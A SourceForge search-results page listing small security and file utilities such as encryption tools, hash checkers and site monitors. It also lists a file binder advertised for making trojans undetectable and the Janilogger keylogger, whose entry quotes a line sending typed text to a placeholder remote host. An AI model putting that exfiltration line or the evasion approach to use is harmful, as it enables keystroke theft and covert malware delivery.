Search Results for "sourceforge.net/projects/winpython/files/winpython_3.8/3.8.10.0/winpython64-3.8.10.0.7z" - Page 23

Showing 913 open source projects for "sourceforge.net/projects/winpython/files/winpython_3.8/3.8.10.0/winpython64-3.8.10.0.7z"

View related business solutions
  • Award-Winning Medical Office Software Designed for Your Specialty Icon
    Award-Winning Medical Office Software Designed for Your Specialty

    Succeed and scale your practice with cloud-based, data-backed, AI-powered healthcare software.

    RXNT is an ambulatory healthcare technology pioneer that empowers medical practices and healthcare organizations to succeed and scale through innovative, data-backed, AI-powered software.
    Learn More
  • Premier Construction Software Icon
    Premier Construction Software

    Premier is a global leader in financial construction ERP software.

    Rated #1 Construction Accounting Software by Forbes Advisor in 2022 & 2023. Our modern SAAS solution is designed to meet the needs of General Contractors, Developers/Owners, Homebuilders & Specialty Contractors.
    Learn More
  • 1
    Password Protector

    Password Protector

    Encrypt and protect passwords and usernames

    Password Protector allows you to securely store your passwords and usernames in one place using AES256 for encryption, which is the recommended cryptosystem used in Banks. Password Protector uses a master password to encrypt your passwords, but it can also use optional 'key files' - small files that are required for the encryption/decryption process. You can put the file on any portable storage you keep with you (USB sticks, phones, music players...) to add an extra layer of security - even if someone knows the master password, if they don't have the key file, they can't get in! Worried you might forget the master password? ...
    Downloads: 0 This Week
    Last Update:
    See Project
  • 2
    ...If you'd like to help support our development, or take over the development please let us know. Explore the internal file structure of your iphone (or of a seized phone in the case of forensic teams) using either the iphone's own backup files or (for jail broken iphones) ssh. Viewing of plist, sqlite, and hex are supported. IOS 5 is now supported iOS 6 only partially works at the moment (some features fail or are missing). Unfortunately paid work means we can't fix this right now, but would welcome anyone else submitting patches.
    Leader badge
    Downloads: 28 This Week
    Last Update:
    See Project
  • 3
    Encrypter

    Encrypter

    Encrypter is a free folder encrypting and hiding utility software.

    Encrypter is a free folder encrypting and hiding utility software for Windows 32bit platform. Encrypter is powerful but lightweight software written in VB.NET for Windows 7, Vista and XP.
    Downloads: 0 This Week
    Last Update:
    See Project
  • 4
    Adsocks

    Adsocks

    Administrador Remoto

    Herramienta de Administración Remota opensource escrito en Java. Nota: El creador de este herramienta no se hace responsable del mal uso que le puedan dar a esta herramienta.
    Downloads: 0 This Week
    Last Update:
    See Project
  • Failed Payment Recovery for Subscription Businesses Icon
    Failed Payment Recovery for Subscription Businesses

    For subscription companies searching for a failed payment recovery solution to grow revenue, and retain customers.

    FlexPay’s innovative platform uses multiple technologies to achieve the highest number of retained customers, resulting in reduced involuntary churn, longer life span after recovery, and higher revenue. Leading brands like LegalZoom, Hooked on Phonics, and ClinicSense trust FlexPay to recover failed payments, reduce churn, and increase customer lifetime value.
    Learn More
  • 5
    eSCAPe (Enhanced SCAP Editor) is used to create Security Content Automation Protocol (SCAP) content files, in particular OVAL & XCCDF files. Allows experts to create SCAP content without requiring in-depth knowledge of the protocols themselves.
    Downloads: 0 This Week
    Last Update:
    See Project
  • 6
    Hash Calculator

    Hash Calculator

    MD5/SHA1 file and string hash calculator

    Hash Calculator is a small tool to calculate hash values from files and string input. Only md5 and sha1 supported at the moment. Option to export hash results to a text file.
    Downloads: 0 This Week
    Last Update:
    See Project
  • 7

    yeo

    command-line steganography application

    designed to hide messages in jpg and png images without the requirement for any plain-text files. uses aes256 on data, using an sha256 hash of the password as the encryption key. rotates the password by 1 character, and uses an sha256 hash of that for the random seed for the image pointer access. security and invisibility of data is currently being peer-reviewed (since ~2014). At this point it looks like no vulnerabilities have been identified yet.
    Downloads: 0 This Week
    Last Update:
    See Project
  • 8

    samizdat

    Kerberized Messaging Toolkit for Java

    Samizdat is a toolkit for Java for building Kerberos secured distributed, message-oriented applications. The toolkit contains base classes that simplifies the management of Kerberos login contexts as well as flexibly sign and seal messages between principals using the Java GSS API. The toolkit contains Transformation classes for Kerberizing JMS traffic as well as a super-lean HTTP based protocol stack that supports both Synchronous (RPC) and Asynchronous modalities.
    Downloads: 0 This Week
    Last Update:
    See Project
  • 9
    Archives Comment Pro

    Archives Comment Pro

    Generate Colourful Comments For Archives

    Archives Comment Pro Is A Program Designed To Allow Peoples Who Wish To Have Colourful Comments In Their Archives. This Software Will Help To Make It Easy Generating Colourful Comments Which Can Be Saved In Text File Format. Then Import That Saved Text Files To Your Archives Using Archive Creating Softwares(Winrar-Best One) That Supports Importing Comment Files. Important Note : Archives Comment Pro Requires .NET Framwork 4 Or Above Regards, AryChh
    Downloads: 0 This Week
    Last Update:
    See Project
  • Rezku Point of Sale Icon
    Rezku Point of Sale

    Designed for Real-World Restaurant Operations

    Rezku is an all-inclusive ordering platform and management solution for all types of restaurant and bar concepts. You can now get a fully custom branded downloadable smartphone ordering app for your restaurant exclusively from Rezku.
    Learn More
  • 10
    Cardito
    Description How To Use: Cardito.exe <Folder Path> e.g. Cardito.exe "D:\Card Data" Pros: Very Quick and Lightweight Cardito is a simple Credit Card Number searching tool. It does a simple recursive scan of all files in the specified directory and checks the condition of the found numbers to Luhn's algorithm. It does not require installation. It has to be placed locally on the machine which is to be scanned. Cardito is small yet powerful. Currently, it supports the following file formats to be scanned: txt, csv, log, xml, htm, html, rtf. If you feel there is a need to add any more formats which you encounter, it is very simple to do so from the source. ...
    Downloads: 0 This Week
    Last Update:
    See Project
  • 11
    SMBSpider

    SMBSpider

    Windows share network scanner

    The SMBSpider search in a netwok for public windows shares. The program can be used to list or copy the discovered files. You can define a single ip or a network range in cidr notation for scanning. The findings can be filtered with regex pattern.
    Downloads: 0 This Week
    Last Update:
    See Project
  • 12
    mFileBinder

    mFileBinder

    An advanced file binder which binds multiple file of any type

    mFileBinder is an advanced file binder which binds multiple file of any type and merges into a single executable file. mFileBinder uses rijndael encryption algorithm to encrypt the file which can make Virus / Trojans Fully Undetectable. Set the drop location of all files and set the execution mode(Background,Foreground) of each file. Predefined set of ICON Package is included set your desired icon. Silently extracts and sequentially execute files.
    Downloads: 3 This Week
    Last Update:
    See Project
  • 13
    This project is a Steganography software that allows you conceal files inside any picture type.
    Downloads: 0 This Week
    Last Update:
    See Project
  • 14
    SimpleSiteAudit Multisite

    SimpleSiteAudit Multisite

    Detect file changes on remote web sites

    Combat the hackers with ‘Simple Site Audit Multisite’ website protection. With SSAM installed, you will be notified by email of any file changes that occur on your monitored sites. SSAM will detect files that have been added, removed or modified and if file permissions are changed. You will be able to automatically monitor all your sites from one ‘Master’ web site. Your sites can be monitored for hacker activity without any detectable monitoring system on the sites themselves. The ‘Master’ site can also be monitored by the same script. ...
    Downloads: 0 This Week
    Last Update:
    See Project
  • 15
    ES-E

    ES-E

    Evolved Studios Encryption is a new platform of protection.

    ES-E is a fully downloaded encryption algorithm that you can use for your WebServer or use it for your programs (by grabbing the output off the webpage). Check the Files page for the latest build.
    Downloads: 0 This Week
    Last Update:
    See Project
  • 16
    OhCrypt Encryption Tool
    OhCrypt lets you easily encrypt and decrypt files using some of the most popular algorithms, like AES, Blowfish and Serpent. With OhCrypt, you can secure your data with a password-based encryption algorithm through a clean and simple interface. It demonstrates state of the art of cryptology techniques, such as password hashing and salt. Ohcrypt also features self-extractable and self-destructive encrypted files
    Downloads: 0 This Week
    Last Update:
    See Project
  • 17
    HTTP Anti Flood/DoS Security Module

    HTTP Anti Flood/DoS Security Module

    Detect Flooder IPs, Reduce Attack Surface against HTTP Flood Attacks

    ...You can test module here: http://www.iosec.org/test.php (demo) Watch the Proof of Concept video: http://goo.gl/dSiAL Hakin9 IT Security Magazine Article about IOSEC http://goo.gl/aQM4Di (different format -> http://goo.gl/JKMUPN) IJNSA Article at http://goo.gl/LLxRdX WP Plugin Page http://goo.gl/nF5nD CHANGES v.1.8.2 - Iptables Auto Ban Bash Script Included - Token Access via Implicit Deny - Reverse Proxy Support - reCAPTCHA Support Do you want more features? Check for third party addons http://sf.net/projects/iosecaddons Gökhan Muharremoğlu
    Downloads: 6 This Week
    Last Update:
    See Project
  • 18
    InteliSpider
    Extendable and flexible e-Discovery tool designed to identify information on a file system, databases and within files (such as Zip, Jar, Outlook Personal Folders, Open Document and Office Open XML).
    Downloads: 0 This Week
    Last Update:
    See Project
  • 19
    Now you can transfer messages with privacy. This app adds a strong Base64 256-bit Encryption to your text, making it unreadable without the use of this app. Just enter your text, encrypt it, and share! People who want to view it can then decrypt your text by using this app on their computer.
    Downloads: 0 This Week
    Last Update:
    See Project
  • 20

    macls

    Perl ls-like command shows mtime, atime, ctime for Linux

    Pure Perl script that has the sole purpose of grabbing the atime, mtime, and ctime of a file or a bunch of files and outputting the results. M-A-C ls (macls)
    Downloads: 0 This Week
    Last Update:
    See Project
  • 21

    Spondulas

    Spondulas is browser emulator designed to retrieve web pages for hunti

    Spondulas is browser emulator and parser designed to retrieve web pages for hunting malware. It supports generation of browser user agents, GET/POST requests, and SOCKS5 proxy. It can be used to parse HTML files sent via e-mail. Monitor mode allows a website to be monitored at intervals to discover changes in DNS or content over time. Autolog mode creates an investigation file that documents redirection chains. The retrieved web pages are parsed for links and reported to an output file. More information is available on the wiki.
    Downloads: 0 This Week
    Last Update:
    See Project
  • 22
    chksm-chkfile

    chksm-chkfile

    Windows MD5/SHA-1/SHA-256 file hashes calculator.

    ...Functionalities : - automatically retrieve text from Windows clipboard and compare it. - 32 & 64 bits windows platforms supported - Installation (Add to file context menu) - Uninstallation Requirements: - Microsfot .NET Framework 2.0 Files: chksm-chkfile.exe MD5: c0b7761deeb7d7dc45aa04726309d4ca SHA1: b19e8013ce1ea6c297c682a9ad5940024f8ff68e SHA256: a539d86960ec28429d98fc619a213efd8435d4c340f78c4d07bb1494ace82ce5 chksm-chkfile-src.zip MD5: f60acabb5a5e3e0e930b74e918e20d71 SHA1: 05ec2018fe4de677b1f27b498be3b61afe5f15c1 SHA256: e5c9caba615066c539a7ff523ea1a89af6dcf1665fd47362dd95bc8adf88fe65
    Downloads: 0 This Week
    Last Update:
    See Project
  • 23
    Janilogger

    Janilogger

    Visual Basic based keylogger program

    ...Janilogger sends datas to your database via log.asp with this command Webbrowser1.Navigate("http://www.x.com/log.asp?yaz=text1.text") -Log.asp included in source files
    Downloads: 1 This Week
    Last Update:
    See Project
  • 24
    Files Hash code Verifier

    Files Hash code Verifier

    A tool to verify and generate MD5,SHA,CRC32 hash of multiple files

    A Security tool that will help to verify the hash codes of files . Currently,Our Hash Code verifier tool supports the following Hash types: MD5,SHA,CRC32. More details about the tool can be found in the project homepage.
    Downloads: 1 This Week
    Last Update:
    See Project
  • 25

    AntiDef

    Anti defacement command line tool

    ...Server administrator should run the application with the following specific parameters: path to the copy of the web site (source), path to the application directory, path to log directory and few more optional parameters. This tool compares the source and the destination files, then copies the "defaced" files if any change occurs. The comparison occurs by default every 60 seconds, but can be defined differently. Developer: Nir Valtman Blog: http://valtman-nir.blogspot.com
    Downloads: 1 This Week
    Last Update:
    See Project
MongoDB Logo MongoDB